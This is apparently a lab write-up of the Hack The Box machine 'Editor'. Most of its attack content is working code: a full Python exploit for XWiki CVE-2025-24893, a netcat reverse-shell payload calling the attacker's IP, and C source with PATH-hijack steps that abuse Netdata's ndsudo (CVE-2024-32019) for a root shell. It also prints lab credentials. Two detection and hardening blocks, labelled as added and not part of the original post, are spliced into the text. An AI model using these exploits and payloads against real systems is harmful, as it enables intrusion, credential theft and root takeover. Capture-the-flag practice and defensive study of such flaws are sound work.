Hackthebox: Editor

Foued SAIDI

Overview

Editor is an easy-difficulty machine from Hack The Box. It starts with CVE-2025-24893, a remote code execution flaw in XWiki Platform, which lets us exfiltrate user credentials, and ends with CVE-2024-32019, a local privilege escalation through Netdata's ndsudo.


Reconnaissance

PORT     STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.13 (Ubuntu Linux; protocol 2.0)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://editor.htb/
8080/tcp open http Jetty 10.0.20
| http-cookie-flags:
| /:
| JSESSIONID:
|_ httponly flag not set
| http-methods:
|_ Potentially risky methods: PROPFIND LOCK UNLOCK
|_http-open-proxy: Proxy might be redirecting requests
| http-robots.txt: 50 disallowed entries (15 shown)
| /xwiki/bin/viewattachrev/ /xwiki/bin/viewrev/
| /xwiki/bin/pdf/ /xwiki/bin/edit/ /xwiki/bin/create/
| /xwiki/bin/inline/ /xwiki/bin/preview/ /xwiki/bin/save/
| /xwiki/bin/saveandcontinue/ /xwiki/bin/rollback/ /xwiki/bin/deleteversions/
| /xwiki/bin/cancel/ /xwiki/bin/delete/ /xwiki/bin/deletespace/
|_/xwiki/bin/undelete/
|_http-server-header: Jetty(10.0.20)
| http-title: XWiki - Main - Intro
|_Requested resource was http://10.10.11.80:8080/xwiki/bin/view/Main/
| http-webdav-scan:
| WebDAV type: Unknown
| Allowed Methods: OPTIONS, GET, HEAD, PROPFIND, LOCK, UNLOCK
|_ Server Type: Jetty(10.0.20)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

We have our usual SSH (22) and HTTP (80) ports open, with HTTP redirecting us to editor.htb, which we will add to /etc/hosts, alongside a web application deployed on port 8080.

Web Application - http://editor.htb:8080

Looking around we can find a wiki on editor.htb: wiki.editor.htb

XWiki - Main - Intro

Doing some googling we discover CVE-2025-24893-EXP, a proof of concept for CVE-2025-24893, which is a remote code execution vulnerability in XWiki.

We can start testing with a basic whoami command:

kujen@DESKTOP-MFRH5U5:~/HackTheBox/Machines/Editor/CVE-2025-24893-EXP$ python3 CVE-2025-24893-EXP.py  -u http://wiki.editor.htb/xwiki -c whoami
[+] Command Output:
xwiki

However, change the PoC code to this:

import argparse
import requests
import re
from urllib.parse import urljoin, quote
import html

BANNER = """
===========================================================
CVE-2025-24893
XWiki Remote Code Execution Exploit
Author: Artemir
===========================================================
"""

def extract_output(xml_text):
    decoded = html.unescape(xml_text)
    match = re.search(r"\[}}}(.*?)\]", decoded)
    if match:
        return match.group(1).strip()
    else:
        return None

def exploit(url, cmd):
    headers = {
        "User-Agent": "Mozilla/5.0",
    }

    payload = (
        "}}}{{async async=false}}{{groovy}}"
        f"println('{cmd}'.execute().text)"
        "{{/groovy}}{{/async}}"
    )

    encoded_payload = quote(payload)
    exploit_path = f"/xwiki/bin/get/Main/SolrSearch?media=rss&text={encoded_payload}"
    full_url = urljoin(url, exploit_path)

    try:
        response = requests.get(full_url, headers=headers, timeout=10)
        if response.status_code == 200:
            output = extract_output(response.text)
            if output:
                print("[+] Command Output:")
                print(output)
            else:
                print("[!] Exploit sent, but output could not be extracted.")
                print("[*] Raw response (truncated):")
                print(response.text[:500])
        else:
            print(f"[-] Failed with status code: {response.status_code}")
    except requests.RequestException as e:
        print(f"[-] Request failed: {e}")

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="CVE-2025-24893 - XWiki RCE PoC")
    parser.add_argument("-u", "--url", required=True, help="Target base URL (e.g. http://example.com)")
    parser.add_argument("-c", "--cmd", required=True, help="Command to execute")

    args = parser.parse_args()
    exploit(args.url, args.cmd)

Now go to http://wiki.editor.htb/xwiki/bin/view/Main/SolrSearch and enter this payload:

}}}{{async async=false}}{{groovy}}println("busybox nc 10.10.16.14 9001 -e /bin/sh".execute().text){{/groovy}}{{/async}}

Then click the link below it to trigger it.
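On the detection side, the request above leaves a recognisable trace: a SolrSearch URL whose text parameter contains wiki macros. The following is an added example, not part of the original post or the PoC: a log check that decodes nested percent-encoding before matching. The log lines are constructed, and the function names and the macro list are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Wiki script/async macros have no place in a search term.
MACRO_RE = re.compile(r"\{\{\s*/?\s*(groovy|async|velocity|python)\b", re.I)
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed access-log lines (combined log format), not captured traffic.
SAMPLE_LOG = [
    '10.0.0.5 - - [06/Dec/2025:21:00:01 +0000] "GET /xwiki/bin/view/Main/'
    'SolrSearch?text=groovy+tutorial HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [06/Dec/2025:21:00:07 +0000] "GET /xwiki/bin/get/Main/'
    'SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D'
    '%7B%7Bgroovy%7D%7Dprintln%281%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync'
    '%7D%7D HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [06/Dec/2025:21:00:09 +0000] "GET /xwiki/bin/get/Main/'
    'SolrSearch?media=rss&text=%257B%257Bgroovy%257D%257Dprintln%25281'
    '%2529%257B%257B%252Fgroovy%257D%257D HTTP/1.1" 200 880 "-" "curl/8.5"',
    '10.0.0.5 - - [06/Dec/2025:21:00:12 +0000] "GET /xwiki/bin/view/Main/ '
    'HTTP/1.1" 200 7300 "-" "Mozilla/5.0"',
]

def decode_fully(value, max_rounds=3):
    """Undo nested percent-encoding so double-encoded macros are still seen."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_suspicious(log_line):
    """True when a SolrSearch request carries a wiki macro in its text parameter."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return False
    url = urlsplit(m.group(1))
    if not url.path.rstrip("/").endswith("/Main/SolrSearch"):
        return False
    terms = parse_qs(url.query, keep_blank_values=True).get("text", [])
    return any(MACRO_RE.search(decode_fully(t)) for t in terms)

def flagged(lines):
    return [i for i, line in enumerate(lines) if is_suspicious(line)]

if __name__ == "__main__":
    for i in flagged(SAMPLE_LOG):
        print("ALERT line", i, SAMPLE_LOG[i][:60])
```

A plain search for the word "groovy" is not flagged, because the match requires the macro's opening braces.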

After getting a shell, run ‘grep -iR password’ and we get oliver's credentials, oliver:theEd1t0rTeam99, and the user flag:

oliver@editor:~$ cat user.txt
388dbae40f5d2e047b2d91391c5392ce
oliver@editor:~$

Privilege Escalation - CVE-2024-32019

We can see oliver is a member of the netdata group:

oliver@editor:~$ id
uid=1000(oliver) gid=1000(oliver) groups=1000(oliver),999(netdata)

We can confirm Netdata is present by listing the SUID binaries, which include ndsudo:

oliver@editor:~$ find / -perm -u=s -type f 2>/dev/null
/opt/netdata/usr/libexec/netdata/plugins.d/cgroup-network
/opt/netdata/usr/libexec/netdata/plugins.d/network-viewer.plugin
/opt/netdata/usr/libexec/netdata/plugins.d/local-listeners
/opt/netdata/usr/libexec/netdata/plugins.d/ndsudo
/opt/netdata/usr/libexec/netdata/plugins.d/ioping
/opt/netdata/usr/libexec/netdata/plugins.d/nfacct.plugin
/opt/netdata/usr/libexec/netdata/plugins.d/ebpf.plugin
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/su
/usr/bin/umount
/usr/bin/chsh
/usr/bin/fusermount3
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/mount
/usr/bin/chfn
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/libexec/polkit-agent-helper-1

Doing some googling we can find CVE-2024-32019, which works by injecting a malicious binary into the user’s PATH that impersonates a trusted command (nvme) and is executed with root privileges by ndsudo.

Steps:

First, compile this code on your own machine:

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main() {
    printf("Got root!\n");

    // Drop into a root shell
    setuid(0);
    setgid(0);
    execl("/bin/bash", "bash", "-p", NULL);

    // If execl fails
    perror("execl");
    return 1;
}

Run:
gcc nvme.c -o nvme

  1. Take it to the machine with wget
  2. Copy it to /tmp
  3. Run export PATH=/tmp:$PATH
  4. chmod +x /tmp/nvme
  5. /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-list

And get a root shell!
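The root cause in the steps above is a setuid helper resolving nvme through the caller's PATH. The following is an added example, not code from the original post and not Netdata's actual patch: it contrasts that lookup with a hardened one that ignores the caller's PATH and accepts only root-owned locations that group and others cannot write to. TRUSTED_PATH and all function names are assumptions, and the planted file is a harmless stand-in that is never executed.

```python
import os
import shutil
import stat
import tempfile

# Assumption: a fixed search path the helper trusts instead of the caller's PATH.
TRUSTED_PATH = "/usr/sbin:/usr/bin:/sbin:/bin"

def resolve_untrusted(cmd, caller_path):
    """Vulnerable pattern: look the command up in the caller-controlled PATH."""
    return shutil.which(cmd, path=caller_path)

def is_root_controlled(path):
    """Owned by root and not writable by group or others."""
    st = os.stat(path)
    return st.st_uid == 0 and not st.st_mode & (stat.S_IWGRP | stat.S_IWOTH)

def resolve_hardened(cmd, trusted_path=TRUSTED_PATH):
    """Ignore the caller's PATH; accept only root-controlled files and directories."""
    found = shutil.which(cmd, path=trusted_path)
    if found is None:
        return None
    real = os.path.realpath(found)
    if is_root_controlled(real) and is_root_controlled(os.path.dirname(real)):
        return real
    return None

def demo():
    """Plant a harmless stand-in named nvme in a temp dir and compare lookups."""
    with tempfile.TemporaryDirectory() as user_dir:
        planted = os.path.join(user_dir, "nvme")
        with open(planted, "w") as fh:
            fh.write("#!/bin/sh\necho stand-in\n")
        os.chmod(planted, 0o755)
        caller_path = user_dir + os.pathsep + TRUSTED_PATH
        picked_untrusted = resolve_untrusted("nvme", caller_path)
        picked_hardened = resolve_hardened("nvme")
        # (caller PATH picks the planted file, fixed PATH picks the planted file)
        return picked_untrusted == planted, picked_hardened == planted

if __name__ == "__main__":
    print(demo())
```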

That was it for Editor, hope you learned something new!
-0xkujen

  • Title: Hackthebox: Editor
  • Author: Foued SAIDI
  • Created at : 2025-12-06 21:42:39
  • Updated at : 2025-12-06 22:08:00
  • Link: https://kujen5.github.io/2025/12/06/Hackthebox-Editor/
  • License: This work is licensed under CC BY-NC-SA 4.0.